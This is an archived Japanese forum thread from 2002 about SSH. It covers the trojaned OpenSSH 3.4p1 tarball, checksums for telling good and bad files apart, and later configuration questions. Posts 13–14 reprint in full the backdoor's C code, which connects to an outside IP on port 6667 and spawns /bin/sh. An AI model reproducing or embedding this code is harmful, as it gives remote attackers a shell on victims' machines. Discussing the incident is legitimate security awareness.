5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

SSH その2

1 :名無しさん@Emacs:02/08/01 08:23
SSH に関する情報を扱います。
前スレ: http://pc.2ch.net/test/read.cgi/unix/976497035/

2 :名無しさん@Emacs:02/08/01 08:24
関連リンク集(前スレより)
本家SSH: http://www.ssh.com/
(日本語) http://www.ipsec.co.jp/products/ssh/
OpenSSH: http://www.openssh.com/ja/
OpenSSH 情報: http://www.unixuser.org/~haruyama/security/openssh/
OpenSSH マニュアル: http://www.unixuser.org/~euske/doc/openssh/jman/
PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty/
(PuTTY日本語版): http://hp.vector.co.jp/authors/VA024651/
(PuTTYスレ) http://pc.2ch.net/test/read.cgi/unix/1014702733/l50
TTSSH: http://www.zip.com.au/~roca/ttssh.html
MacSSH: http://www.macssh.com/
WideのSSH解説: http://www.soi.wide.ad.jp/class/20000009/slides/12/
IETF SecSH Protocol: http://www.ietf.org/html.charters/secsh-charter.html
SSH FAQ: http://www-vacia.media.is.tohoku.ac.jp/~s-yamane/FAQ/ssh/ssh-faq.html
PortForwarder: http://portforwarder.nttsoft.net/JP/
VNC on SSH: http://www.uk.research.att.com/vnc/faq.html
Tramp: http://ls6-www.informatik.uni-dortmund.de/~grossjoh/emacs/tramp_ja.html
おまけ・Theoのキチガイぶり: http://pc.2ch.net/test/read.cgi/unix/1023635938/546-550


3 ::02/08/01 12:44
ついでにコレも:
(TTSSH日本語版): http://www.sakurachan.org/soft/teraterm-j/ttssh/

4 :名無しさん@お腹いっぱい。:02/08/01 17:22
portable版3.4p1にトロイの木馬ですか。。((;゚д゚))ガクガクブルブル

5 :名無しさん@お腹いっぱい。:02/08/01 17:27
>>4
某サーバの6667につないで/bin/shしてるよーな、そんな感じ。
<トロイ


6 :通行人さん@無名タレント:02/08/01 17:33
>>4
詳細&ソースぷりーず

7 :名無しさん@お腹いっぱい。:02/08/01 17:36
>>6
だいじょぶなやつ
837668 bytes
MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8

ダメなやつ
840574 bytes
MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57



8 :名無しさん@お腹いっぱい。:02/08/01 17:37
せっかくだからageときましょ

9 :名無しさん@お腹いっぱい。:02/08/01 17:41
>>7
ダメなやつってopenssh.comが配布してたの?
それともmirrorのふりしてニセモノつかませてたサイトがあったとか?

10 :名無しさん@お腹いっぱい。:02/08/01 17:42
>>9
さっき、マスターサイトから取得したら、ダメファイルだたよ…。
おそらく出回ってるミラーも、現在は危険でしょう。


11 :名無しさん@お腹いっぱい。:02/08/01 17:53
いつごろからダメファイル設置されていたんでしょう?

12 :名無しさん@お腹いっぱい。:02/08/01 17:53
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=394609+0+current/freebsd-security

13 :名無しさん@お腹いっぱい。:02/08/01 17:57
参考までに、ビルド時に生成されて実行されるコード:

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int s;
char *i_val = "\x2f\x62\x69\x6e\x2f\x73\x68";
void sig(int sig){
close(s);
sleep(3600);
longjmp(env, 0);
} int main() {
int x;
char c, *a[2];
struct sockaddr_in sa;
struct sigaction act;
switch (fork()) {
case 0:
break;
default:
exit(0);
} close(0);
close(1);
close(2);
memset(&act, 0, sizeof(act));
act.sa_handler = sig;
sigaction(SIGALRM, &act, NULL);


14 :名無しさん@お腹いっぱい。:02/08/01 17:57
do {
setjmp(env);
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1))
exit(1);
memset(&sa, 0, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(6667);
sa.sin_addr.s_addr = inet_addr("203.62.158.32");
alarm(10);
if (connect(s, (struct sockaddr *) & sa, sizeof(sa)) == (-1))
exit(1);
if ((x = read(s, &c, 1)) == (-1)) {
exit(1);
} else if (x == 1) {
switch (c) {
case 'A':
exit(0);
case 'D':
alarm(0);
dup2(s, 0);
dup2(s, 1);
dup2(s, 2);
a[0] = i_val;
a[1] = NULL;
execve(a[0], a, NULL);
break;
case 'M':
alarm(0);
sig(0);
break;
default:
}
} else {
exit(0);
}
} while (1);
}


15 :名無しさん@お腹いっぱい。:02/08/01 17:57
i_val はすなわち "/bin/sh" ね。

16 :名無しさん@お腹いっぱい。:02/08/01 18:45
ftp.u-aizu.ac.jp でダメファイルを確保しますた。
Ring はどうよ?

17 :名無しさん@お腹いっぱい。:02/08/01 19:15
ring は OpenSSH のミラーしてないみたい。
うちでは /usr/ports/distfiles/ にだいじょうぶなやつがあったんで、
ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/ を調べたが、
ftp> dir openssh*
150 Opening ASCII mode data connection for '/bin/ls'.
-rw-r--r-- 1 1006 1006 330665 May 1 2001 openssh-2.9.tgz
-rw-r--r-- 1 1006 1006 662590 Jun 17 2001 openssh-2.9p2.tar.gz
-rw-r--r-- 1 1006 1006 363849 Nov 14 2001 openssh-3.0.1.tgz
-rw-r--r-- 1 1006 1006 780980 Nov 15 2001 openssh-3.0.1p1.tar.gz
-rw-r--r-- 1 1006 1006 364230 Mar 29 04:51 openssh-3.0.2.tgz
-rw-r--r-- 1 1006 1006 781092 Mar 29 04:51 openssh-3.0.2p1.tar.gz
-rw-r--r-- 1 1006 1006 9071 May 10 06:47 openssh-3.1-adv.token.patch
-rw-r--r-- 1 1006 1006 367903 Mar 6 00:43 openssh-3.1.tgz
-rw-r--r-- 1 1006 1006 9203 May 10 06:47 openssh-3.1p1-adv.token.patch
-rw-r--r-- 1 1006 1006 803104 Mar 7 02:41 openssh-3.1p1.tar.gz
226 Transfer complete.
残念、まだミラーされてなかった模様。

18 :名無しさん@お腹いっぱい。:02/08/01 19:30
ftp://ftp.ring.gr.jp/pub/OpenBSD/OpenSSH/portable/

ここのは正常だったよ。

19 :名無しさん@お腹いっぱい。:02/08/01 19:31
ring でも /pub/OpenBSD/OpenSSH/portable/ にあると思いますが、
毒入りかどうかは未確認(たぶんまだかな)。
すでに毒がまわっている OpenBSD のミラーもいくつかあるようです。

20 :16:02/08/01 19:35
ftp.u-aizu.ac.jp には大丈夫な奴とダメな奴の
両方があるみたいだね。ダメファイルは多分

/pub/net/security/ssh/openssh/portable

の方。

21 :名無しさん@カラアゲうまうま:02/08/01 19:42
>>12
これはOpenBSDでコンパイルするときがヤバイってこと?

22 :名無しさん@お腹いっぱい。:02/08/01 19:46
see http://www.mavetju.org/weblog/weblog.php

23 :名無さん@腹へった:02/08/01 20:26
>>19
いくつかの Ring サーバで /pub/OpenBSD/OpenSSH/portable のを
調べたけど大丈夫だった


24 :名無しさん@お腹いっぱい。:02/08/01 20:37
Ring サーバって OpenBSD 自体が無いところもいくつかあるね。
近い ring.ocn.ad.jp には無かったよ。(´・ω・`)ショボーン

25 :名無しさん@お腹いっぱい。:02/08/01 20:56
bf-test.cそのものは単にソース吐いてるだけか...


26 :名無しさん@お腹いっぱい。:02/08/02 01:00
で,この原因はftp.openbsd.orgがcrackされたということなの?

27 :名無しさん@お腹いっぱい。:02/08/02 01:13
>>26
実は Theo たんが…

28 :名無しさん@お腹いっぱい。:02/08/02 01:19
おまいらportable版なぞ使わずOpenBSDを使え! っすか? (((;゚Д゚))ガクガクブルブル

29 :名無しさん@お腹いっぱい。:02/08/02 01:24
>>26

たぶんそう。
てことは、ssh だけじゃなくて、OpenBSD 本体の方も、書換えが
行なわれてないか調べる必要があるわけだが...

30 :名無しさん@お腹いっぱい。:02/08/02 01:35
こういう時って、ftp.openbsd.orgの中身は全て信頼できないものと見なさな
いと危険だよね。
CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。


31 :名無しさん@お腹いっぱい。:02/08/02 03:05
misc@に流れたAdvisoryのapplication/pgp-signatureがdemimeされていてちょっとワラタ

32 :名無しさん@お腹いっぱい。:02/08/02 04:18
> CVSリポジトリはTheoの手元にあるみたいだから大丈夫かな。

その筈なんだが、もし ftp.openbsd.org で root も盗られていて、しかも
ftp.openbsd.org と cvs.openbsd.org で共通にアカウントを持つ人間がいた
りすると、結構やばい。
この前の monkey.org の件でも、同じ心配があるな。

33 :.:02/08/02 10:38
OpenBSDは、どうなってしまうんだろう。。。

34 :名無しさん@お腹いっぱい。:02/08/02 11:04
別にどうもならん。

35 :名無しさん@お腹いっぱい。:02/08/02 12:12
>>33
セキュリティが唯一の取り柄のOSだったのに、
マトモな人なら使うの止めるだろうなぁ。


36 :名無しさん@お腹いっぱい。:02/08/02 12:22
誰かまぬけな俺に教えてくれ。 どうして ftp.openbsd.orgは > 220 merlin FTP server (SunOS 4.1) ready. なのですか? ひょとして、トロイ埋め込まれたのはOpenBSDのせいじゃないんじゃ?

37 :36:02/08/02 12:23
あれ?
改行が通らねえ…見苦しくてスマソ。

38 :名無しさん@お腹いっぱい。:02/08/02 12:31
>>36
http://www.openbsd.org/faq/faq8.html#wwwsolaris

39 :名無しさん@お腹いっぱい。:02/08/02 15:25
いよいよdjbsshの出番d(略

40 :名無しさん@お腹いっぱい。:02/08/02 15:32
Theoがなにも考えずに3.4にあげろっていってたのはこのためか。

41 :名無しさん@お腹いっぱい。:02/08/02 15:48
危険なのでage

42 :名無しさん@お腹いっぱい。:02/08/02 16:58
         Theoワッショイ!!
     \\  Theoワッショイ!! //
 +   + \\ Theoワッショイ!!/+
         S    S    H     +
.   +   /□\  /□\  /□\  +
      ( ´∀`∩(´∀`∩)( ´ー` )
 +  (( (つ   ノ(つ  丿(つ  つ ))  +
       ヽ  ( ノ ( ヽノ  ) ) )
       (_)し' し(_) (_)_)


43 :名無しさん@お腹いっぱい。:02/08/02 17:51
毒を仕込んだの、実はTheo

44 :名無しさん@お腹いっぱい。:02/08/02 19:14
>39 マヂであったら欲しい。

45 :名無しさん@お腹いっぱい。:02/08/02 19:16
問題のweb.snsonline.net って、何奴?

46 :名無しさん@カラアゲうまうま:02/08/02 19:32
単なるホスティングサービスだろう。
今は動いてないようだが、たぶん不要なircdが動いてるのを利用されたんだろう。

47 :名無しさん@サンマうまうま:02/08/02 22:17
Theo尊師祭りのところすみません。
OpenSSLを上げたら
debug1: ssh_dss_verify: signature incorrect
と出てpublickey認証が通らなくなっちゃったんですが、何かご存知の方おしえてください。
よろしくおながいします。

48 :名無しさん@お酒のみすぎ:02/08/03 01:10
自己レスすんません、gcc-2.95.2.1で-funroll-all-loopsつけるとダメだったみたいです、 make testも通りませんでした。-funroll-all-loopsを外したら通りました。

49 :名無しさん@カラアゲまうまう:02/08/03 01:10
cvs.openbsd.org が疑われているようです…

50 :名無しさん@お腹いっぱい。:02/08/03 16:44
げげ〜。cvs リポジトリ全体が信頼できないとなると、OpenSSH だけじゃなく
OpenBSD 全体がかな〜りやばいことにならんか?

51 :名無しさん@お腹いっぱい。:02/08/03 21:30
もうだめぽ

52 :名無しさん@お腹いっぱい。 :02/08/04 14:41
OpenSSHがんばってくりっちょ!

53 :名無しさん@お腹いっぱい。:02/08/04 15:16
Solaris9についてる
Sun SSHってどーよ?
一応OpenSSHベースらしいが、
どのくらい違うのでしょう。

54 :名無しさん@お腹いっぱい。:02/08/04 21:11
O p e n B S D 落 日 の 日 迫 る! ! !

55 :名無しさん@お腹いっぱい。:02/08/04 21:13
>>53
俺も普段 Solaris 使ってないから分からないけど、
心配なら本家から porting されてる OpenSSH 使えば?


56 :名無しさん@お腹いっぱい。:02/08/04 22:37
>>54
マジだとしてマジレスするとちょっと残念だな。

57 :名無しさん@お腹いっぱい。:02/08/04 23:53
今回の件は、べつにOpenBSD自体の脆弱性が呈されたわけでもなんでもないでしょう。

ところで前から気になってたんだけど、おなじディレクトリに .md5置いとくのって、
あんまり意味ないよね。(それとも、crack対策じゃなくて、ファイルが壊れてないかどうかの検証用なのかな?)


58 :初期不良:02/08/05 01:29
ftp.openbsd.org anonymous ログインできないでつ...

59 :名無しさん@お腹いっぱい。:02/08/05 07:43
>>57
OpenBSD「プロジェクト」の脆弱性ははっきりしたのは確か

60 :57:02/08/05 07:51
>>59
そういう考え方もあったかー。

でも、問題のsunsiteなんとか切れば、というか使うのやめたらそれで
おしまいな話なんじゃないの?

61 :名無しさん@お腹いっぱい。:02/08/05 12:08
>>60
monkey.org の方は openbsd 使ってたんじゃないの?



62 :名無しさん@お腹いっぱい。:02/08/05 20:23
>>61
それって単にミラーリングで伝播しただけってのとは違うの?

(といっても、monkey.orgってのがどんな代物かも知らないのですが...詳細きぼん。)

63 :名無しさん@お腹いっぱい。:02/08/05 22:05
> それって単にミラーリングで伝播しただけってのとは違うの?

sshの件とは関係ない。

> 詳細きぼん

bugtraq と monkey.org を指定して google で探すと、最初に出てくるぞ。
monkey.org は、OpenBSD の committer がやっているサイトね。

64 :名無しさん@お腹いっぱい。:02/08/05 23:47
しまった、保存する前に前スレがdat落ちしてしまったよ…ウワァァン
誰か前スレ保存している方いらっしゃいませんか?

65 :名無しさん@お腹いっぱい。:02/08/06 01:26
途中までなら
http://www.google.co.jp/search?q=cache:hihesdfKKgsC:pc.2ch.net/test/read.cgi/unix/976497035/+&hl=ja&ie=UTF-8

66 :名無しさん@お腹いっぱい。:02/08/06 03:22
http://www.42ch.net/UploaderSmall/source/1028571690.dat
bzip2でし

67 :64:02/08/06 05:47
>>65
ありがとうございます。…しかし、見たい部分はさらに後の方にあるようです…

>>66
おおおおおー!拡張子をbz2に変更して解凍したら見ることができました。
# 「不完全な」HTMLファイルといったカンジですな

68 :名無しさん@お腹いっぱい。:02/08/06 06:30
>67
http://www.skipup.com/~niwatori/index3.htm#dat

69 :名無しさん@Emacs:02/08/06 22:44
いまさらだけど、

http://130.158.36.68/~pooh/ssh.html

70 :名無しさん@お腹いっぱい。:02/08/07 00:24
で、春山さんのトコに過去ログHTML置いてくれると嬉かったり…。

71 :64=67:02/08/07 03:31
>>68
えぇ、知っております。しかしID登録する気はないので(苦笑)、>>64を書いたので
した。

>>70
同意です!!

72 :名無しさん@お腹いっぱい。:02/08/07 08:03
読めないdat落ちスレのミラー作ります
http://ton.2ch.net/test/read.cgi/gline/1026576001/

73 :春山征吾 ◆9Ggg6xsM :02/08/07 12:23
http://www.unixuser.org/%7Eharuyama/security/openssh/dat/pc.2ch.net_80__unix_dat_976497035.html

http://www.moonwolf.com/ruby/のdat2html.rbで変換したものを置きました。


74 :名無しさん@お腹いっぱい。:02/08/07 21:41
OpenSSH は theo と OpenBSD とともに入滅の時を待っています。

75 :名無しさん@カラアゲうまうま:02/08/07 22:30
OpenSSHが死んだらつぎはFreSSHかねえ

76 :名無しさん@お腹いっぱい。:02/08/07 22:55
>>75
意味わかんね。

77 :70:02/08/07 23:10
>>73
春山さん、ありがとうございます!!(m__m)


78 :名無しさん@お腹いっぱい。:02/08/07 23:59
>>76
ttp://www.fressh.org

79 :名無しさん@お腹いっぱい。:02/08/08 02:57
>>78
あ、そういうのがあるんね。無知でスマソ。

80 :名無しさん@お腹いっぱい。:02/08/12 05:09
>>57
md5って壊れてないかどうかのチェック用で、
crack対策はPGPやGPGの署名を使えばいいんじゃない?

81 :名無しさん@お腹いっぱい。:02/08/12 11:26
>>80
まあパッケージ一つ一つを署名するのは面倒な作業だと思うけど、
sshとかのセキュリティ関係のプログラムだけ署名するなら現実的ですね。
今度は「この署名は正しいようだが、これを署名した人間は本当に
信用出来るのか?」という問題が出てくるから、それなりの人物の署名でないと
意味が無いので…

82 :login:Penguin:02/08/12 11:39
opensslが0.9.6gになってるんだけど、ちゃんとopensshもmakeしなおしましたか?

83 :名無しさん@お腹いっぱい。:02/08/12 13:23
>>82
し直さないとダメなんでしょうか? ダメなんですよね、きっと。
その場合って、openssh を make distclean とかする必要あります?

84 :名無しさん@お腹いっぱい。:02/08/12 13:25
>>82
漏れは openssl を shared でコンパイルしてるから、ssh は
再起動しただけですが何か?
ssh -V
OpenSSH_3.4p1, SSH protocols 1.5/2.0, OpenSSL 0x0090607f


85 :login:Penguin:02/08/12 15:40
ldd /usr/sbin/sshd
してみたら、たしかにsharedでリンクされてるんだけど、
libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x280d0000)
これで,
ls -al /usr/lib/libcrypto.so.3
で見てみると古いライブラリなんですよね。
あたらしいやつは
/usr/lib/libcrypto.so.2
みたい。やっぱりmakeしなおしですか?
一応再起動してみたけど、
/usr/lib/libcrypto.so.3
にリンクされてたもんで・・・


86 :名無しさん@お腹いっぱい。:02/08/12 16:11
>>85
犬板とクロスポストかよ おめでてえな

87 :名無しさん@お腹いっぱい。:02/08/12 16:56
>>85
libcrypto.so.3 がライブラリの実体なんですか?
別のファイルのシンボリックリンクだったりしません?
私の所では、libcrypto.so.0.9.5a のリンクで、
そちらのタイムスタンプはアップデート後のものになってました。

88 :名無しさん@お腹いっぱい。 :02/08/12 17:30
libcrypto.so.3 はライブラリの実体でした。
libcrypto.soはlibcrypto.so.2にシンボリックリンクになってます。
きっとopensslをmakeする前はlibcrypto.soはlibcrypto.so.3にシンボリックリンクされてたんだと思います。

OpenSSHをmakeするときに、libcrypto.soにリンクしてくれればいいのに。。。

89 :名無しさん@お腹いっぱい。:02/08/12 21:47
elfのmajorの話と混同してないか?

90 :名無しさん@お腹いっぱい。:02/08/12 21:59
openssl 0.9.6c を make install している最中に sshd が落ちた…。
openssl の Makefile は libcrypto.so.0.9.6 を上書きしちまうのか?
また 0.9.6e でも同じことをせんように気をつけねば。

91 :sage:02/08/12 22:52
0.9.6e じゃなくて、0.9.6gにしとけ >> 90

92 :名無しさん@お腹いっぱい。:02/08/12 23:00
堅い方法だと、singleに落としてmake installするしかないのかな

93 :名無しさん@お腹いっぱい。:02/08/12 23:05
このへんの正しいインストール手順きぼんぬ。

94 :名無しさん@お腹いっぱい。:02/08/12 23:05
>>90 上書きしてくれなきゃバージョンアップの意味ないのでわ? ちなみに、shared を置き換えて daemon が落ちるのはごく普通。

95 :名無しさん@お腹いっぱい。:02/08/13 00:47
FreeBSDだとlibcrypto.so.2 で、Solarisだとlibcrypto.so.0.9.6 になってるなぜ?

96 :名無しさん@お腹いっぱい。:02/08/13 01:40
>>92
network 経由じゃそれをやるのは不可能に近いからねぇ。それをやろうとすると
Terminal server を用意して…とかいうことになる。

>>94
一番悪いのは version number の持つ意味をなかば無視して 0.9.6 のまま固定
しちゃっていることだけど、Makefile のほうも古い library を mv して
mv libcrypt.so.0.9.6 libcrypt.so.0.9.6-old してから新規 library を
libcrypt.so.0.9.6 として install してくれれば、とりあえず被害はある程度は
収まる。

97 :名無しさん@お腹いっぱい。:02/08/13 03:12
openssl の config や Makefile ってかなり腐っているな…。
config --prefix=/usr/local --openssldir=/usr/local/ssl ってやっても
意図通りに install されないんで Makefile 見たら萎えた。

とっとと autoconf に移行しろよ…。

98 :名無しさん@お腹いっぱい。:02/08/13 03:39
>>97
まずあり得ないと思われ

autoconfってGPL/LGPL縛りあるんでない?

99 :名無しさん@お腹いっぱい。:02/08/13 03:50
>>98
configureやconfig.*のコメント見てみ。縛りは無いYO。

100 :名無しさん@お腹いっぱい。:02/08/13 12:23

 ┌─────────┐
 │               .|
 │  100get   │
 │               .|
 └―――──――――┘
      ヽ(´ー`)ノ
         (  へ)
          く


101 :名無しさん@Emacs:02/08/13 21:57
FreeBSDを今日のSTABLEにしたらKeyChainが動かなくなってしまいった。
一週間前にSTABLEでは大丈夫だった。
portsからインストールした1.9
起動時にこんなエラーが。

/usr/local/bin/keychain: 244: Syntax error: "||" unexpected

OpenSSL関係かな?

102 :名無しさん@お腹いっぱい。:02/08/13 22:01
>>101
OpenSSHそのものとは無関係

/bin/shでの文法の解釈が微妙に変わった副作用だな

詳しくはこのへん参照
http://pc.2ch.net/test/read.cgi/unix/1028052350/211

103 :101:02/08/13 22:29
>>102
そうですか。
KeyChain側で対応すべき問題なのかな?

104 :名無しさん@お腹いっぱい。:02/08/14 03:06
>>101
http://www.freebsd.org/cgi/query-pr.cgi?pr=40386

105 :名無しさん@XEmacs:02/08/14 10:20
♯お約束?

>>103
> KeyChain側で対応すべき問題なのかな?

だからどうして keychain なぞを使わにゃならんのかと小一時間…


106 :101:02/08/14 11:47
>>105
自分が自宅で使うマシンで、keychainが便利だから。


107 :104:02/08/15 03:10
>>101
http://docs.freebsd.org/cgi/getmsg.cgi?fetch=2169031+0+archive/2002/cvs-all/20020811.cvs-all
まで辿り着けたのでせうか。

108 :FreeBSD質問スレの206=211:02/08/15 03:41
>>107
あら、/bin/sh側に修正入ったのね。
17日にMFCかかったらCVSupするか…。

109 :名無しさん@お腹いっぱい。:02/08/16 06:22
freebsd4.5Rを使ってますがsshd_configで
AllowUsers user1 user2
特定のユーザであり特定のip addrからのみssh接続許可したいのですが
どうすれば良いのでしょうか?

110 :名無しさん@お腹いっぱい。:02/08/16 09:22
>109
tcpd


111 :名無しさん@XEmacs:02/08/16 10:11
>>109
> freebsd4.5Rを使ってますがsshd_configで
> AllowUsers user1 user2
> 特定のユーザであり特定のip addrからのみssh接続許可したいのですが
> どうすれば良いのでしょうか?

AllowUsers を知っていながらこういう質問が出るってことは OpenSSH
2.9p1 辺り?

3.Xp に上げれば

AllowUsers user1@ip1 user2@ip2

で逝けるだろう。


112 :名無しさん@お腹いっぱい。:02/08/16 17:09
>>109
PasswordAuthentication no にして、鍵認証だけを
許可するって方法もあるです。AllowUsers の方が
楽だけど。


113 :109ではないけど:02/08/16 17:35
>>111
初めて知ったっ!ありがとうございます!

> 3.Xp に上げれば
>
> AllowUsers user1@ip1 user2@ip2
>
> で逝けるだろう。

うーん、アナウンスメールでの変更内容見てもこれに関する記述はなかった
なぁ…。

ChangeLog見てみるかな…。

114 :113:02/08/16 17:40
あー、ちなみに、3.0.2p1にはその機能はなかったですね(3.0.2までのChangeLogは
読んだ)。ということは3.1以降ですね。


量が多くて大変だが見てみっか!ゴルァァァァ

115 :名無しさん@XEmacs:02/08/16 20:39
>>114
> あー、ちなみに、3.0.2p1にはその機能はなかったですね(3.0.2までのChangeLogは
> 読んだ)。ということは3.1以降ですね。

あー、そーなんだー。手元には 2.9 と 3.1 以降しかなかったんで気
付かず 3.X ってかいちまったっす。

> 量が多くて大変だが見てみっか!ゴルァァァァ

ChangeLog より、直截的に auth.c の allowd_user() 辺りを 2.9 と
3.[1-4] とで見比べてみる方が早道。


116 :名無しさん@XEmacs:02/08/16 20:44
> ChangeLog より、直截的に auth.c の allowd_user() 辺りを 2.9 と

もちろん、

< ChangeLog より、直截的に auth.c の allowed_user() 辺りを 2.9 と

ね。

♯いかん、最近この手のミスが多いな。

あと match.c と。


117 :113=114:02/08/17 00:02
レスどうもです。

>>115
>>116
 アドバイスありがとうございます。見てみます。

# 最初>>116でおっしゃっている意味がさっぱり分からなかったんですが、今
# もう一回見たらやっと分かった…allowd_user()ではなく、allow*e*d_user()
# なわけですね。

ちなみに、3.0.2p1のマニュアルにはこういった記述はないですが、3.4p1のマニュアル
(日本語訳はhttp://www.unixuser.org/~euske/doc/openssh/jman/sshd_config.html参照)
にはバッチリ書かれてますね。

118 :名無しさん@お腹いっぱい。:02/08/17 04:38
opensshを最新にしたらps ax
sshd: user [priv] (sshd)
sshd: user@ttyp0 (sshd)
でこうなるんですがこれで正常なんですよね?

119 :113=114:02/08/17 10:14
ChangeLogをざっと眺めてみたけど、これだ!というのが見つからなかったです…。
それらしきものは以下の部分かなぁ…。

20020304
 - OpenBSD CVS Sync
   - stevesk@cvs.openbsd.org 2002/02/28 19:36:28
   [auth.c match.c match.h]
   delay hostname lookup until we see a ``@'' in DenyUsers and AllowUsers
   for sshd -u0; ok markus@
   - stevesk@cvs.openbsd.org 2002/02/28 20:36:42
   [sshd.8]
   DenyUsers allows user@host pattern also


で、3.1p1のsshd.8を見てみたら件のUSER@HOSTに関する説明が追加されているのを
確認しますた。sshd.8のAllowUsersオプションに関する部分より:
all users. If the pattern takes the form USER@HOST
then USER and HOST are separately checked, restricting
logins to particular users from particular hosts.

120 :113=114=119:02/08/17 11:13
さらに、>>115>>116で述べられていたソースコードを見てみますた…ざっと見
たところ、最終的にはmatch.cのmatch_user()関数に行き着くようですね。で、この
関数は2.9p2→2.9.9p2で追加されたようです。
 2.9p2: RCSID("$OpenBSD: match.c,v 1.12 2001/03/10 17:51:04 markus Exp $");
2.9.9p2: RCSID("$OpenBSD: match.c,v 1.14 2001/06/27 04:48:53 markus Exp $");

…で、2.9.9p2の配布ファイルのChangeLogを見てみると、該当個所ハケーン:
20010704
 - OpenBSD CVS Sync
  - markus@cvs.openbsd.org 2001/06/27 04:48:53
   [auth.c match.c sshd.8]
   tridge@samba.org

んなの分かるかヴォケェェェ!!!!!!きちんと説明書けやゴルァァァ!

121 :113=114=119=120:02/08/17 11:36
結論:
機能そのものは2.9p2→2.9.9p2で追加され、マニュアルでの記述は3.0.2p1→3.1p1で
追加された。

122 :名無しさん@XEmacs:02/08/17 17:19
>>120
> さらに、>>115>>116で述べられていたソースコードを見てみますた…

乙渇れー。

> んなの分かるかヴォケェェェ!!!!!!きちんと説明書けやゴルァァァ!

つーこって、“Use the source, Luke”なんだ罠、やっぱ。


123 :名無しさん@XEmacs:02/08/17 17:27
>>118
ttp://www.unixuser.org/~haruyama/security/openssh/README.privsep_nihongo.txt

124 :120=121:02/08/18 07:50
>>122
いちおう、自分なりにやってみたわけですが、分析結果は正しいですよね?>>122
んをはじめ、他の人のアドバイスきぼんぬ。

あと、話の腰を折る気は全くないんですが(本当ですっっ)、“Use the source, Luke”
って何なんですか?元ネタはopenssh-unix-dev?

125 :名無しさん@カラアゲうまうま:02/08/18 07:57
s/source/force/
Luke = Skywalker

126 :名無しさん@お腹いっぱい。:02/08/18 10:07
May the source be with you.

127 :名無しさん@XEmacs:02/08/18 10:47
>>124
> いちおう、自分なりにやってみたわけですが、分析結果は正しいですよね?>>122
> んをはじめ、他の人のアドバイスきぼんぬ。

正しいっす。

たしかに 2.9.9 から allowed_users() が match_pattern() を直接
じゃなくて match_user() を引数に hostname と ipaddr を追加し
た上で呼び出すようになり、match_user() のなかで user を '@'
で分割した上で前者を match_pattern()、後者を match_host_and_ip()
でそれぞれマッチするかどうかチェックするようになってますね。

実際に試しちゃいないけど、このコードなら 3.4 の man page に書
いてあるのと同じ動作をする筈。

ただ、開発者でもなんでもないおいらの話はもとより、開発者本人
のにしろその言を信じるってのは、『1 (ヵ月|週間|日|時間|分|秒)
前の自分は他人』の法則に則る限りお奨めできない。

ドキュメントや開発者本人がなんと言おうと、プログラムはソース
に書かれている通りにしか動きまへん。コードと自分の目を信じま
せう。

で、“Use the source, Luke”に関してはすでにいくつかフォローが
あるけど、このフレーズでぐぐってみればいろいろ当たるっす。なか
でも

ttp://burks.brighton.ac.uk/burks/foldoc/61/122.htm

辺りの説明が的確かしらん。

128 :名無しさん@カラアゲうまうま:02/08/18 11:17
openssh にかぎらず、ドキュメンテーションって openbsd では
わりとおざなりにされてるような気がする。


129 :名無しさん@お腹いっぱい。:02/08/18 22:50
/home/hoge/.ssh/authorized_keysとファイルを作ったのですが、
hogeのパーミッションを706とかにすると、
Authentication refused: bad ownership or modes for directory /home/hoge
とエラーが出てしまいます。
705だとログイン出来るのですが、その他ユーザの権限として書き込みの権限(2)を与えてはいけないんでしょうか。

130 :名無しさん@お腹いっぱい。:02/08/18 22:53
>>129
少なくとも、好ましいことではないな。

131 :名無しさん@お腹いっぱい。:02/08/18 23:00
>>129
sshd_configのStrictModesで挙動を変えられるが
お勧めはしない。


132 :名無しさん@お腹いっぱい。:02/08/18 23:37
>>129
authorized_keysの中に勝手に鍵を追加されたりしたら、
誰でもあなたになりすますことができちゃいますよ。

133 :129ではないが…:02/08/19 00:23
>>132
いや、必ずしもauthorized_keysの内容が変更されるとは限らないYO!

>>129ではホームディレクトリ(/home/hoge)のパーミションの話はしているが、
~/.sshや~/.ssh/authorized_keysのパーミションについては何も言ってないから
な。

ホームディレクトリのパーミションを調べているのは、~/.[rs]hostsが関わってく
るからでしょう。ホームディレクトリが所有者以外に書き込み権限を与えられていた
ら、その権限を利用して~/.[rs]hostsを書き換えられる可能性があるからな。(直接
編集はできなくても削除→作成という手順で結果として書き換えることは可能)

>>129
ssh以外の部分でもいろいろ問題が出てくる(例:~/.profileとかも~.[rs]hostsと同様
書き換えられることになる)んだから、所有者以外に書き込み権限を与えるのは
やめとけ。

134 :124:02/08/19 00:35
>>127
フォローThanksです。すなわち、ドキュメントとか見るより(そしてUsenetとかで
質問するより)実際にソースコードを読んだ方が早いYOってことね。

135 :129:02/08/19 02:20
皆さんありがとうございました。
確かに自分以外に権限を与えるのは危険ですね…。
参考になりました。

136 :名無しさん@XEmacs (= 122):02/08/19 16:33
>>134
>>126 (B-)

♯“方が早い”というよりは“方が確実だ”かな。結局全然早くない
♯ことも多い。


137 :yamasa:02/08/21 00:10
前スレの910さん、遅くなりましたがQandA変更しておきました。
ttp://home.jp.FreeBSD.org/cgi-bin/QandA/readmail.cgi/QandA-work/5481

138 :名無しさん@お腹いっぱい。:02/08/26 09:21
SSH1 Protocol に対して SSH2 Protocol の利点ってなんでしょうか?


139 :名無しさん@お腹いっぱい。:02/08/26 10:00
>>138
Man in the middle attack について調べてきましょう。

140 :名無しさん@XEmacs:02/08/26 13:19
>>139
> Man in the middle attack について調べてきましょう。

MITM に関しては SSH1 も SSH2 も等価。最初の一発はどっちもごまか
される可能性があるし、二回目以降はユーザ認証に公開鍵暗号を使っ
ていれば検出可能 (ただし、PKI に対応している商用版を持って来る
とまた話は別だが)。

いちばん大きな差はやっぱ integrity check の部分だろうね。SSH2は
